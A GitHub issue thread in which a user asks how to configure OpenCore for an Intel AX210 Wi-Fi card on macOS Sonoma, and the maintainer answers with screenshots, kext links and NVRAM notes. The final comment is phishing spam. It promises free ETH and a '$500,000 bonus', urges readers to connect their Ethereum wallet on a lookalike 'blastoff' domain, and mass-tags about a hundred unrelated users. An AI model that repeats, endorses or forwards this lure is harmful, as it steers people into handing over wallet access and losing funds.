### ISSUE TITLE
Opencore Configurator

### ISSUE THREAD

**Issue by derpuma** [perez987/Intel-AX210-wifi6-on-macOS-Sonoma#1]
Not sure how to edit the Config.
Could you add some screenshots from Opencore Configurator how to set the kext and edit the config from there?
Would be nice!

**Comment by perez987** [comment]
@derpuma 
Are you the person I answered in InsanelyMac?

Here are the screenshots, tell me if this is what you requested.

![Kernel](https://github.com/perez987/Intel-AX210-wifi6-on-macOS-Sonoma/assets/50429399/19164dbb-4e78-4798-a1cf-f85c167c7674)

![Misc-Security](https://github.com/perez987/Intel-AX210-wifi6-on-macOS-Sonoma/assets/50429399/c28d642d-e5b1-44a9-b2fe-c36395f7a31b)

![NVRAM](https://github.com/perez987/Intel-AX210-wifi6-on-macOS-Sonoma/assets/50429399/132dcedf-0248-4512-a52a-eea565b307ee)

**Comment by perez987** [comment]
@derpuma 
Remember this (also in IM):

- On Sonoma 14.3, try AirportItlwm.kext from this comment (issue in the OpenIntelWireless GitHub):
https://github.com/OpenIntelWireless/itlwm/issues/937#issuecomment-1963569381
- But on Sonoma 14.4 beta, try this AirportItlwm.kext (different issue in the OpenIntelWireless GitHub):
https://github.com/OpenIntelWireless/itlwm/issues/953#issuecomment-1920413379

**Comment by perez987** [comment]
@derpuma 
About these 2 Bluetooth properties in NVRAM, I can't be sure if they are required, my system has no difference with or without them.
 
![bluetooth-nvram1](https://github.com/perez987/Intel-AX210-wifi6-on-macOS-Sonoma/assets/50429399/03151f67-bf64-488e-8b9c-1c3057af6b11)

![bluetooth-nvram12](https://github.com/perez987/Intel-AX210-wifi6-on-macOS-Sonoma/assets/50429399/0754ff8d-3923-4848-aad9-3c973249e1a9)

Without them being written in config.plist, NVRAM shows the same properties but in this case the value of `bluetoothInternalCOntrollerInfo` is different (`00000000 00000000 d0034bce 69f8`).

**Comment by perez987** [comment]
@derpuma 
I close the issue, moving to InsanelyMac. But feel free to comment or open it at any moment if needed.

**Comment by swdthomas** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
anxiouscomputer, @gdn0101, @guozhe001, @openainext, @shreyanshp, @LightTemplar, @semsphy, @abbymaea, @cfelicio, @tristanhcole, @adhirajb1109, @vafanassieff, @acto-felix, @pranavnt, @raidensakura, @Sh4dowNight, @FcknPerfect, @Im4smutiaraw, @Nazdroth, @imyelo, @Sebidev, @mcnaveen, @daviddahl, @hackedunit, @sehyunchung, @leuro, @LockonS, @jmmanos, @EliothMonroy, @Maxwelltoo, @Bulko1, @herveGuigoz, @AVerdaasdonk, @quiint, @hasnhasan, @Hampe-tech, @mrkaqz, @fitrh, @cryptedbv, @jemjemgaldones, @psxx, @JamesTsetsekas, @laisangbum, @dorucioclea, @Krychaz, @felixseblanc, @alexaf2000, @idk4385, @byteshiva, @onixiya1337rolocampusano, @unalkalkan, @ivl2077, @phrazzld, @yekeskin, @twocitizenships, @waynelyon, @manjufy, @wzooff, @jpambrun, @kolarcz, @h13World, @Juan-Esc, @Anxod5002, @ssssota, @Avensen, @sourbrambles, @mrluanma, @coolxy, @skmezanul, @xmm, @Lucaskrell, @madorca, @fannarsh, @stoutZero, @filmgirl, @BlackPan, @kankawee-pat, @undeyio, @brunohpaiva, @ZekeriyaAY, @mikurumoe, @truppelito, @zensharp, @synzhang, @maxdec, @pankaj151, @ShrootBuck, @kalvin807, @Hypertrophik, @vkwb, @Atugatran, @RaminMT, @PeterMcBTC, @sebdanielsson, @ArtskydJ, @romainframe, @VitalyVaryvdin, @rhiskey, @rportugal
